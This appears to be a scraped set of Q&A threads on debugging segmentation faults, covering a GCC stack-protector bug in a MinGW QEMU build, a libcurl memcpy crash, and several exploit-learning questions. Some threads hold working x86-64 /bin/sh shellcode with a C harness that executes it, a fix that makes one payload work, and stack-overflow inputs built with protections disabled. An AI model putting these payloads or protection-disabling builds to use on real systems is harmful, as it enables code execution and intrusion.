Root cause a segmentation fault

Root cause a segmentation fault - c

Background
I've built qemu-system-x86_64.exe on a Windows machine using MSYS2 (x86_64), and I'm debugging a segmentation fault that happens when I try to run it.
Actually I don't think the problem is related to either QEMU or MSYS2, it's a problem of debugging segmentation fault and possibly wrong code generation.
Debugging the Segmentation Fault
The program crashes with segmentation fault error right at the beginning.
When running with gdb, I found out the following:
Starting program: C:\msys64\home\Administrator\qemu\x86_64-softmmu\qemu-system-x86_64.exe
[New Thread 4656.0x1194]
Program received signal SIGSEGV, Segmentation fault.
0x00000000007d3254 in getpagesize () at util/oslib-win32.c:535
535 {
(gdb) bt
#0 0x00000000007d3254 in getpagesize () at util/oslib-win32.c:535
#1 0x000000000086dd39 in init_real_host_page_size () at util/pagesize.c:16
#2 0x00000000007ea1b2 in __do_global_ctors ()
at C:/repo/mingw-w64-crt-git/src/mingw-w64/mingw-w64-crt/crt/gccmain.c:67
#3 0x00000000007ea20f in __main ()
at C:/repo/mingw-w64-crt-git/src/mingw-w64/mingw-w64-crt/crt/gccmain.c:83
#4 0x000000000040137f in __tmainCRTStartup ()
at C:/repo/mingw-w64-crt-git/src/mingw-w64/mingw-w64-crt/crt/crtexe.c:329
#5 0x00000000004014db in WinMainCRTStartup ()
at C:/repo/mingw-w64-crt-git/src/mingw-w64/mingw-w64-crt/crt/crtexe.c:195
This is strange.
The program crashes when running __do_global_ctors and calling init_real_host_page_size() which calls getpagesize(). These are really simple functions:
uintptr_t qemu_real_host_page_size;
intptr_t qemu_real_host_page_mask;
static void __attribute__((constructor)) init_real_host_page_size(void)
{
qemu_real_host_page_size = getpagesize();
qemu_real_host_page_mask = -(intptr_t)qemu_real_host_page_size;
}
...
int getpagesize(void)
{
SYSTEM_INFO system_info;
GetSystemInfo(&system_info);
return system_info.dwPageSize;
}
getpagesize() crashes right at the beginning of the function, before it even calls GetSystemInfo.
Here is the disassembly of that code fragment and register values:
(gdb) disassem
Dump of assembler code for function getpagesize:
0x00000000007d3250 <+0>: sub $0x68,%rsp
=> 0x00000000007d3254 <+4>: mov %fs:0x0,%rax
0x00000000007d325d <+13>: mov %rax,0x58(%rsp)
0x00000000007d3262 <+18>: xor %eax,%eax
0x00000000007d3264 <+20>: lea 0x20(%rsp),%rcx
0x00000000007d3269 <+25>: callq *0x68e8b9(%rip) # 0xe61b28 <__imp_GetSystemInfo>
0x00000000007d326f <+31>: mov 0x24(%rsp),%eax
0x00000000007d3273 <+35>: mov 0x58(%rsp),%rdx
0x00000000007d3278 <+40>: xor %fs:0x0,%rdx
0x00000000007d3281 <+49>: jne 0x7d3288 <getpagesize+56>
0x00000000007d3283 <+51>: add $0x68,%rsp
0x00000000007d3287 <+55>: retq
0x00000000007d3288 <+56>: callq 0x85bde0 <__stack_chk_fail>
0x00000000007d328d <+61>: nop
End of assembler dump.
(gdb) info registers
rax 0x6f4b868 116701288
rbx 0x86ec10 8842256
rcx 0x6f4b8b8 116701368
rdx 0xe5a780 15050624
rsi 0x86e220 8839712
rdi 0x6f4ad50 116698448
rbp 0x6f4ad10 0x6f4ad10
rsp 0x22fd80 0x22fd80
r8 0x0 0
r9 0x0 0
r10 0x5000016b 1342177643
r11 0x22f9d8 2292184
r12 0x0 0
r13 0x10 16
r14 0x0 0
r15 0x0 0
rip 0x7d3254 0x7d3254 <getpagesize+4>
eflags 0x10202 [ IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x53 83
gs 0x2b 43
It looks like something is wrong with the memory access mov %fs:0x0,%rax.
Who sets FS to 83?
(gdb) starti
Starting program: C:\msys64\home\Administrator\qemu\x86_64-softmmu\qemu-system-x86_64.exe
[New Thread 3508.0x14b0]
Program stopped.
0x00000000778b6fb1 in ntdll!CsrSetPriorityClass ()
from C:\Windows\SYSTEM32\ntdll.dll
(gdb) p $fs
$1 = 83
(gdb) watch $fs
Watchpoint 1: $fs
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00000000007d3254 in getpagesize () at util/oslib-win32.c:535
535 {
No one sets FS!
Questions
GCC generated code that uses uninitialized register. What could cause that? Was there some initialization code that should have run but didn't?
Any ideas how can I further debug this issue?

FS is an x86 segment register. These are generally not set by the user program, but instead set by the OS or by the runtime libraries, for various special purposes. For instance on Windows x86-64 GS is used to point to a per-thread data block: https://en.wikipedia.org/wiki/Win32_Thread_Information_Block (and FS is not used).
In this case the problem is a bug in the GCC 8 compiler you are using: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=86832
In some situations this compiler generates code that assumes FS has been set up for "native TLS", which is wrong because MINGW does not support "native TLS" and FS is not set to anything useful.
The workaround is to avoid compiling with the -fstack-protector-strong compiler option. For QEMU you can do that by passing configure the flag --disable-stack-protector.
(PS: if you want to know how I identified the cause of this segfault: I googled for 'qemu-devel sigsegv getpagesize', which brings up a mailing list thread where somebody else ran into and reported the bug, the problem was diagnosed and a link to the GCC bug found.)

Related

What controls whether code stored in the data section can run or not?

https://www.exploit-db.com/exploits/42179
#include <stdio.h>
unsigned char shellcode[] = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
int main()
{
int (*ret)() = (int(*)())shellcode;
ret();
}
According to the comment in the code, gcc -fno-stack-protector -z execstack shell.c -o shell is supposed to compiled the code on #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux.
I get the following error when I try the above code. How to make it work? What has been changed in the OS so that it does not work any more?
$ uname -a
Linux kali 5.10.0-kali4-amd64 #1 SMP Debian 5.10.19-1kali1 (2021-03-03) x86_64 GNU/Linux
$ gcc -fno-stack-protector -z execstack shell.c -o shell
$ ./shell
Segmentation fault
EDIT: It seems the problem is related with kali linux. The same binary runs on Ubuntu 64bit. I tried to step through the binary with gdb on kali.
The segmentation fault on kali is generated when the shellcode is run.
$ gdb -q shell
Reading symbols from shell...
(No debugging symbols found in shell)
(gdb) b main
Breakpoint 1 at 0x1129
(gdb) start
Temporary breakpoint 2 at 0x1129
Starting program: /tmp/shell
Breakpoint 1, 0x0000555555555129 in main ()
(gdb) disassemble main
Dump of assembler code for function main:
0x0000555555555125 <+0>: push %rbp
0x0000555555555126 <+1>: mov %rsp,%rbp
=> 0x0000555555555129 <+4>: sub $0x10,%rsp
0x000055555555512d <+8>: lea 0x2efc(%rip),%rax # 0x555555558030 <shellcode>
0x0000555555555134 <+15>: mov %rax,-0x8(%rbp)
0x0000555555555138 <+19>: mov -0x8(%rbp),%rdx
0x000055555555513c <+23>: mov $0x0,%eax
0x0000555555555141 <+28>: call *%rdx
0x0000555555555143 <+30>: mov $0x0,%eax
0x0000555555555148 <+35>: leave
0x0000555555555149 <+36>: ret
End of assembler dump.
(gdb) si 5
0x0000555555555141 in main ()
(gdb) disassemble main
Dump of assembler code for function main:
0x0000555555555125 <+0>: push %rbp
0x0000555555555126 <+1>: mov %rsp,%rbp
0x0000555555555129 <+4>: sub $0x10,%rsp
0x000055555555512d <+8>: lea 0x2efc(%rip),%rax # 0x555555558030 <shellcode>
0x0000555555555134 <+15>: mov %rax,-0x8(%rbp)
0x0000555555555138 <+19>: mov -0x8(%rbp),%rdx
0x000055555555513c <+23>: mov $0x0,%eax
=> 0x0000555555555141 <+28>: call *%rdx
0x0000555555555143 <+30>: mov $0x0,%eax
0x0000555555555148 <+35>: leave
0x0000555555555149 <+36>: ret
End of assembler dump.
(gdb) si
0x0000555555558030 in shellcode ()
(gdb) si
Program received signal SIGSEGV, Segmentation fault.
0x0000555555558030 in shellcode ()
(gdb) x/16bx 0x0000555555558030
0x555555558030 <shellcode>: 0x50 0x48 0x31 0xd2 0x48 0x31 0xf6 0x48
0x555555558038 <shellcode+8>: 0xbb 0x2f 0x62 0x69 0x6e 0x2f 0x2f 0x73
Using the same binary on Ubuntu, the shellcode runs correctly.
When I modify the code by putting the shellcode in the stack, then it can run on kali. So the problem is related with whether code in data can be run or not. What controls this behavior?
$ cat shell.c
#include <stdio.h>
int main() {
unsigned char shellcode[] = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
int (*ret)() = (int(*)())shellcode;
ret();
}

What has been changed in the OS so that it does not work any more?
It used to be that readonly-data (.rodata) was put into the read-execute segment, together with .text.
To put shellcode into .rodata, you would need to make it const:
unsigned const char shellcode[] = ...
I don't think the example without const ever worked.
Once you put it into .rodata, it will work when linking with -Wl,-z,noseparate-code on newer systems (if your linker doesn't support noseparate-code, then it is probably old enough that the example will work without any special flags).

gdb addresses: 0x565561f5 instead of 0x41414141

I want to try a buffer overflow on a c program. I compiled it like this gcc -fno-stack-protector -m32 buggy_program.c with gcc. If i run this program in gdb and i overflow the buffer, it should said 0x41414141, because i sent A's. But its saying 0x565561f5. Sorry for my bad english. Can somebody help me?
This is the source code:
#include <stdio.h>
int main(int argc, char **argv)
{
char buffer[64];
printf("Type in something: ");
gets(buffer);
}
Starting program: /root/Downloads/a.out
Type in something: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x565561f5 in main ()
I want to see this:
Starting program: /root/Downloads/a.out
Type in something: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in main ()

Looking at the address at which the process segfaulted shows the relevant line in the disassembled code:
gdb a.out <<EOF
set logging on
r < inp
disassemble main
x/i $eip
p/x $esp
Produces the following output:
(gdb) Starting program: .../a.out < in
Program received signal SIGSEGV, Segmentation fault.
0x08048482 in main (argc=, argv=) at tmp.c:10 10 }
(gdb) Dump of assembler code for function main:
0x08048436 <+0>: lea 0x4(%esp),%ecx
0x0804843a <+4>: and $0xfffffff0,%esp
0x0804843d <+7>: pushl -0x4(%ecx)
0x08048440 <+10>: push %ebp
0x08048441 <+11>: mov %esp,%ebp
0x08048443 <+13>: push %ebx
0x08048444 <+14>: push %ecx
0x08048445 <+15>: sub $0x40,%esp
0x08048448 <+18>: call
0x8048370 <__x86.get_pc_thunk.bx>
0x0804844d <+23>: add $0x1bb3,%ebx
0x08048453 <+29>: sub $0xc,%esp
0x08048456 <+32>: lea -0x1af0(%ebx),%eax
0x0804845c <+38>: push %eax
0x0804845d <+39>: call 0x8048300
0x08048462 <+44>: add $0x10,%esp
0x08048465 <+47>: sub $0xc,%esp
0x08048468 <+50>: lea -0x48(%ebp),%eax
0x0804846b <+53>: push %eax
0x0804846c <+54>: call 0x8048310
0x08048471 <+59>: add $0x10,%esp
0x08048474 <+62>: mov $0x0,%eax
0x08048479 <+67>: lea -0x8(%ebp),%esp
0x0804847c <+70>: pop %ecx
0x0804847d <+71>: pop %ebx
0x0804847e <+72>: pop %ebp
0x0804847f <+73>: lea -0x4(%ecx),%esp
=> 0x08048482 <+76>: ret
End of assembler dump.
(gdb) => 0x8048482 : ret
(gdb) $1 = 0x4141413d
(gdb) quit
The failing statement is the ret at the end of main. The program fails, when ret attempts to load the return-address from the top of the stack. The produced executable stores the old value of esp on the stack, before aligning to word-boundaries. When main is completed, the program attempts to restore the esp from the stack and afterwards read the return-address. However the whole top of the stack is compromised, thus rendering the new value of the stack-pointer garbage ($1 = 0x4141413d). When ret is executed, it attempts to read a word from address 0x4141413d, which isn't allocated and produces as segfault.
Notes
The above disassembly was produced from the code in the question using the following compiler-options:
-m32 -fno-stack-protector -g -O0

So guys, i found a solution:
Just compile it with gcc 3.3.4
gcc -m32 buggy_program.c

Modern operating systems use address-space-layout-randomization ASLR to make this stuff not work quite so easily.
I remember the controversy when it was first started. ASLR was kind of a bad idea for 32 bit processes due to the number of other constraints it imposed on the system and dubious security benefit. On the other hand, it works great on 64 bit processes and almost everybody uses it now.
You don't know where the code is. You don't know where the heap is. You don't know where the stack is. Writing exploits is hard now.
Also, you tried to use 32 bit shellcode and documentation on a 64 bit process.
On reading the updated question: Your code is compiled with frame pointers (which is the default). This is causing the ret instruction itself to fault because esp is trashed. ASLR appears to still be in play most likely it doesn't really matter.

Testing Shellcode With GDB [duplicate]

This question already has an answer here:
Testing Shellcode From C - Bus Error 10
(1 answer)
Closed 6 years ago.
If I just execute shell code program It makes segmentation fault like this
desktop:~$ ./sh02
Segmentaion fault (core dumped)
But, when I debug this program with GDB, this program executes /bin/sh successfully
(gdb) disass 0x4005a0
No function contains specified address.
(gdb) shell ps
PID TTY TIME CMD
4075 pts/4 00:00:00 bash
4099 pts/4 00:00:00 gdb
4101 pts/4 00:00:00 sh
4107 pts/4 00:00:00 ps
(gdb)
After debugging with GDB, this program works well ...
I can't find difference between them
Why I can't run /bin/sh via sh02 program before debugging?
const char str[]=
"\x55"
"\x48\x89\xe5"
"\x48\x31\xff"
"\x57"
"\x57"
"\x5e"
"\x5a"
"\x48\xbf\x2f\x2f\x62\x69\x6e"
"\x2f\x73\x68"
"\x57"
"\x54"
"\x5f"
"\x6a\x3b"
"\x58"
"\x0f\x05"
"\x90"
"\x5d"
"\xc3";
int main()
{
int (*func)();
func = (int (*)()) str;
(int)(*func)();
}
Above is sh02.c code.
I read that questions and answers. But I think my case is little bit different. During debugging with GDB and after debugging sh02 program execute /bin/sh successfully. However only before debugging, it makes segmentation fault
I use Ubuntu 16.04 and x64 architecture

When undefined behavior is invoked the program may crash or not crash (by luck). The program does not null terminate the string sent to exec, the results are undefined.
Try this:
"\x48\xbf\x2f\x62\x69\x6e"
"\x2f\x73\x68\x00"
Note that I dropped the extra '/' and added the '\0' at the end of the string.
I was able to determine the issue by using gdb.
Here is the session perhaps this will help you to learn assembly debugging.
parallels#ubuntu:/tmp$ gcc -g -fno-stack-protector -z execstack -o shellcode shellcode2.c
parallels#ubuntu:/tmp$ gdb ./shellcode
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
...
Reading symbols from ./shellcode...done.
(gdb) b main
Breakpoint 1 at 0x4004f5: file shellcode2.c, line 25.
(gdb) r
Starting program: /tmp/shellcode
Breakpoint 1, main () at shellcode2.c:25
25 func = (int (*)()) str;
(gdb) n
27 (int)(*func)();
(gdb) stepi
0x0000000000400501 27 (int)(*func)();
(gdb) stepi
0x0000000000400506 27 (int)(*func)();
(gdb) stepi
0x00000000004005c0 in str ()
(gdb) disass
Dump of assembler code for function str:
=> 0x00000000004005c0 <+0>: push %rbp
0x00000000004005c1 <+1>: mov %rsp,%rbp
0x00000000004005c4 <+4>: xor %rdi,%rdi
0x00000000004005c7 <+7>: push %rdi
0x00000000004005c8 <+8>: push %rdi
0x00000000004005c9 <+9>: pop %rsi
0x00000000004005ca <+10>: pop %rdx
0x00000000004005cb <+11>: movabs $0x68732f6e69622f2f,%rdi
0x00000000004005d5 <+21>: push %rdi
0x00000000004005d6 <+22>: push %rsp
0x00000000004005d7 <+23>: pop %rdi
0x00000000004005d8 <+24>: pushq $0x3b
0x00000000004005da <+26>: pop %rax
0x00000000004005db <+27>: syscall
0x00000000004005dd <+29>: nop
0x00000000004005de <+30>: pop %rbp
0x00000000004005df <+31>: retq
0x00000000004005e0 <+32>: add %al,(%rax)
End of assembler dump.
(gdb) b *0x4005db
Breakpoint 2 at 0x4005db
(gdb) c
Continuing.
Breakpoint 2, 0x00000000004005db in str ()
(gdb) info reg
rax 0x3b 59
rbx 0x0 0
rcx 0x0 0
rdx 0x0 0
rsi 0x0 0
rdi 0x7fffffffdef8 140737488346872
rbp 0x7fffffffdf00 0x7fffffffdf00
rsp 0x7fffffffdef8 0x7fffffffdef8
r8 0x7ffff7dd4e80 140737351863936
r9 0x7ffff7dea560 140737351951712
r10 0x7fffffffddb0 140737488346544
r11 0x7ffff7a36dd0 140737348070864
r12 0x400400 4195328
r13 0x7fffffffe000 140737488347136
r14 0x0 0
r15 0x0 0
rip 0x4005db 0x4005db <str+27>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) p (char*) $rdi
$1 = 0x7fffffffdef8 "//bin/sh \337\377\377\377\177"
As you can see the string has an extra '/' and no NULL terminator. A simple two character fix and all is well.

EIP value incorrect during buffer overflow

I am working on ubuntu 12.04 and 64 bit machine. I was reading a good book on buffer overflows and while playing with one example found one strange moment.
I have this really simple C code:
void getInput (void){
char array[8];
gets (array);
printf("%s\n", array);
}
main() {
getInput();
return 0;
}
in the file overflow.c
I compile it with 32 bit flag cause all example in the book assumed 32 bit machine, I do it like this
gcc -fno-stack-protector -g -m32 -o ./overflow ./overflow.c
In the code char array was only 8 bytes but looking at disassembly I found that that array starts 16 bytes away from saved EBP on the stack, so I executed this line:
printf "aaaaaaaaaaaaaaaaaaaa\x10\x10\x10\x20" | ./overflow
And got:
aaaaaaaaaaaaaaaaaaaa
Segmentation fault (core dumped)
Then I opened core file:
gdb ./overflow core
#0 0x20101010 in ?? ()
(gdb) info registers
eax 0x19 25
ecx 0xffffffff -1
edx 0xf77118b8 -143583048
ebx 0xf770fff4 -143589388
esp 0xffef6370 0xffef6370
ebp 0x61616161 0x61616161
esi 0x0 0
edi 0x0 0
eip 0x20101010 0x20101010
As you see EIP in fact got new value, which I wanted. BUT when I want to put some useful values like this 0x08048410
printf "aaaaaaaaaaaaaaaaaaaa\x10\x84\x04\x08" | ./overflow
Program crashes as usual but than something strange happens when I'm trying to observe the value in EIP register:
#0 0xf765be1f in ?? () from /lib/i386-linux-gnu/libc.so.6
(gdb) info registers
eax 0x61616151 1633771857
ecx 0xf77828c4 -143120188
edx 0x1 1
ebx 0xf7780ff4 -143126540
esp 0xff92dffc 0xff92dffc
ebp 0x61616161 0x61616161
esi 0x0 0
edi 0x0 0
eip 0xf765be1f 0xf765be1f
Suddenly EIP start to look like this 0xf765be1f, it doesn't look like 0x08048410. In fact I noticed that it's enough to put any hexadecimal value starting from 0 to get this crumbled EIP value. Do you know why this might happen? Is it because I'm on 64 bit machine?
UPD
Well guys in comments asked for more information, here is the disassembly of getInput function:
(gdb) disas getInput
Dump of assembler code for function getInput:
0x08048404 <+0>: push %ebp
0x08048405 <+1>: mov %esp,%ebp
0x08048407 <+3>: sub $0x28,%esp
0x0804840a <+6>: lea -0x10(%ebp),%eax
0x0804840d <+9>: mov %eax,(%esp)
0x08048410 <+12>: call 0x8048310 <gets#plt>
0x08048415 <+17>: lea -0x10(%ebp),%eax
0x08048418 <+20>: mov %eax,(%esp)
0x0804841b <+23>: call 0x8048320 <puts#plt>
0x08048420 <+28>: leave
0x08048421 <+29>: ret

Perhaps code at 0x08048410 was executed, and jumped to the area of 0xf765be1f.
What's in this address? I guess it's a function (libC?), so you can examine its assembly code and see what it would do.
Also note that in the successful run, you managed to overrun EBP, not EIP. EBP contains 0x61616161, which is aaaa, and EIP contains 0x20101010, which is \n\n\n. It seems like the corrupt EBP indirectly got EIP corrupt.
Try to make the overrun 4 bytes longer, and then it should overrun the return address too.

This is probably due to the fact that modern OS (Linux does at least, I don't know about Windows) and modern libc have mechanisms that do not allow code found in stack to be executed.

Buffer overflow is invoking undefined behavior, therefore anything can happen. Theorizing what might happen is futile.

Memcpy segfaulting with valid pointers

I'm using libcurl in my program, and running into a segfault. Before I filed a bug with the curl project, I thought I'd do a little debugging. What I found seemed very odd to me, and I haven't been able to make sense of it yet.
First, the segfault traceback:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fffe77f6700 (LWP 592)]
0x00007ffff6a2ea5c in memcpy () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0 0x00007ffff6a2ea5c in memcpy () from /lib/x86_64-linux-gnu/libc.so.6
#1 0x00007ffff5bc29e5 in x509_name_oneline (a=0x7fffe3d9c3c0,
buf=0x7fffe77f4ec0 "C=US; O=The Go Daddy Group, Inc.; OU=Go Daddy Class 2 Certification Authority\375\034<M_r\206\233\261\310\340\371\023.Jg\205\244\304\325\347\372\016#9Ph%", size=255) at ssluse.c:629
#2 0x00007ffff5bc2a6f in cert_verify_callback (ok=1, ctx=0x7fffe77f50b0)
at ssluse.c:645
#3 0x00007ffff72c9a80 in ?? () from /lib/libcrypto.so.0.9.8
#4 0x00007ffff72ca430 in X509_verify_cert () from /lib/libcrypto.so.0.9.8
#5 0x00007ffff759af58 in ssl_verify_cert_chain () from /lib/libssl.so.0.9.8
#6 0x00007ffff75809f3 in ssl3_get_server_certificate ()
from /lib/libssl.so.0.9.8
#7 0x00007ffff7583e50 in ssl3_connect () from /lib/libssl.so.0.9.8
#8 0x00007ffff5bc48f0 in ossl_connect_step2 (conn=0x7fffe315e9a8, sockindex=0)
at ssluse.c:1724
#9 0x00007ffff5bc700f in ossl_connect_common (conn=0x7fffe315e9a8,
sockindex=0, nonblocking=false, done=0x7fffe77f543f) at ssluse.c:2498
#10 0x00007ffff5bc7172 in Curl_ossl_connect (conn=0x7fffe315e9a8, sockindex=0)
at ssluse.c:2544
#11 0x00007ffff5ba76b9 in Curl_ssl_connect (conn=0x7fffe315e9a8, sockindex=0)
...
The call to memcpy looks like this:
memcpy(buf, biomem->data, size);
(gdb) p buf
$46 = 0x7fffe77f4ec0 "C=US; O=The Go Daddy Group, Inc.; OU=Go Daddy Class 2 Certification Authority\375\034<M_r\206\233\261\310\340\371\023.Jg\205\244\304\325\347\372\016#9Ph%"
(gdb) p biomem->data
$47 = 0x7fffe3e1ef60 "C=US; O=The Go Daddy Group, Inc.; OU=Go Daddy Class 2 Certification Authority\375\034<M_r\206\233\261\310\340\371\023.Jg\205\244\304\325\347\372\016#9Ph%"
(gdb) p size
$48 = 255
If I go up a frame, I see that the pointer passed in for buf came from a local variable defined in the calling function:
char buf[256];
Here's where it starts to get weird. I can manually inspect all 256 bytes of both buf and biomem->data without gdb complaining that the memory isn't accesible. I can also manually write all 256 bytes of buf using the gdb set command, without any error. So if all the memory involved is readable and writable, why does memcpy fail?
Also interesting is that I can use gdb to manually call memcpy with the pointers involved. As long as I pass a size <= 160, it runs without a problem. As soon as I pass 161 or higher, gdb gets a sigsegv. I know buf is larger than 160, because it was created on the stack as an array of 256. biomem->data is a little harder to figure, but I can read well past byte 160 with gdb.
I should also mention that this function (or rather the curl method I call that leads to this) completes successfully many times before the crash. My program uses curl to repeatedly call a web service API while it runs. It calls the API every five seconds or so, and runs for about 14 hours before it crashes. It's possible that something else in my app is writing out of bounds and stomping on something that creates the error condition. But it seems suspicious that it crashes at exactly the same point every time, although the timing varies. And all the pointers seem ok in gdb, but memcpy still fails. Valgrind doesn't find any bounds errors, but I haven't let my program run with valgrind for 14 hours.
Within memcpy itself, the disassembly looks like this:
(gdb) x/20i $rip-10
0x7ffff6a2ea52 <memcpy+242>: jbe 0x7ffff6a2ea74 <memcpy+276>
0x7ffff6a2ea54 <memcpy+244>: lea 0x20(%rdi),%rdi
0x7ffff6a2ea58 <memcpy+248>: je 0x7ffff6a2ea90 <memcpy+304>
0x7ffff6a2ea5a <memcpy+250>: dec %ecx
=> 0x7ffff6a2ea5c <memcpy+252>: mov (%rsi),%rax
0x7ffff6a2ea5f <memcpy+255>: mov 0x8(%rsi),%r8
0x7ffff6a2ea63 <memcpy+259>: mov 0x10(%rsi),%r9
0x7ffff6a2ea67 <memcpy+263>: mov 0x18(%rsi),%r10
0x7ffff6a2ea6b <memcpy+267>: mov %rax,(%rdi)
0x7ffff6a2ea6e <memcpy+270>: mov %r8,0x8(%rdi)
0x7ffff6a2ea72 <memcpy+274>: mov %r9,0x10(%rdi)
0x7ffff6a2ea76 <memcpy+278>: mov %r10,0x18(%rdi)
0x7ffff6a2ea7a <memcpy+282>: lea 0x20(%rsi),%rsi
0x7ffff6a2ea7e <memcpy+286>: lea 0x20(%rdi),%rdi
0x7ffff6a2ea82 <memcpy+290>: jne 0x7ffff6a2ea30 <memcpy+208>
0x7ffff6a2ea84 <memcpy+292>: data32 data32 nopw %cs:0x0(%rax,%rax,1)
0x7ffff6a2ea90 <memcpy+304>: and $0x1f,%edx
0x7ffff6a2ea93 <memcpy+307>: mov -0x8(%rsp),%rax
0x7ffff6a2ea98 <memcpy+312>: jne 0x7ffff6a2e969 <memcpy+9>
0x7ffff6a2ea9e <memcpy+318>: repz retq
(gdb) info registers
rax 0x0 0
rbx 0x7fffe77f50b0 140737077268656
rcx 0x1 1
rdx 0xff 255
rsi 0x7fffe3e1f000 140737016623104
rdi 0x7fffe77f4f60 140737077268320
rbp 0x7fffe77f4e90 0x7fffe77f4e90
rsp 0x7fffe77f4e48 0x7fffe77f4e48
r8 0x11 17
r9 0x10 16
r10 0x1 1
r11 0x7ffff6a28f7a 140737331236730
r12 0x7fffe3dde490 140737016358032
r13 0x7ffff5bc2a0c 140737316137484
r14 0x7fffe3d69b50 140737015880528
r15 0x0 0
rip 0x7ffff6a2ea5c 0x7ffff6a2ea5c <memcpy+252>
eflags 0x10203 [ CF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) p/x $rsi
$50 = 0x7fffe3e1f000
(gdb) x/20x $rsi
0x7fffe3e1f000: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f010: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f020: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f030: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffe3e1f040: 0x00000000 0x00000000 0x00000000 0x00000000
I'm using libcurl version 7.21.6, c-ares version 1.7.4, and openssl version 1.0.0d. My program is multithreaded, but I have registered mutex callbacks with openssl. The program is running on Ubuntu 11.04 desktop, 64-bit. libc is 2.13.

Clearly libcurl is over-reading the source buffer, and stepping into unreadable memory (page at 0x7fffe3e1f000 -- you can confirm that memory is unreadable by looking at /proc/<pid>/maps for the program being debugged).
Here's where it starts to get weird. I can manually inspect all 256 bytes of both
buf and biomem->data without gdb complaining that the memory isn't accesible.
There is a well-known Linux kernel flaw: even for memory that has PROT_NONE (and causes SIGSEGV on attempt to read it from the process itself), attempt by GDB to ptrace(PEEK_DATA,...) succeeds. That explains why you can examine 256 bytes of the source buffer in GDB, even though only 96 of them are actually accessible.
Try running your program under Valgrind, chances are it will tell you that you are memcpying into heap-allocated buffer that is too small.

Do you any possibility of creating a "crumple zone"?
That is, deliberately increasing the size of the two buffers, or in the case of the structure putting an extra unused element after the destination?
You then seed the source crumple with something such as "0xDEADBEEF", and the destination with som with something nice. If the destination every changes you've got something to work with.
256 is a bit suggestive, any possibility it could somehow be being treated as signed quantity, becoming -1, and hence very big? Can't see how gdb wouldn't show it, but ...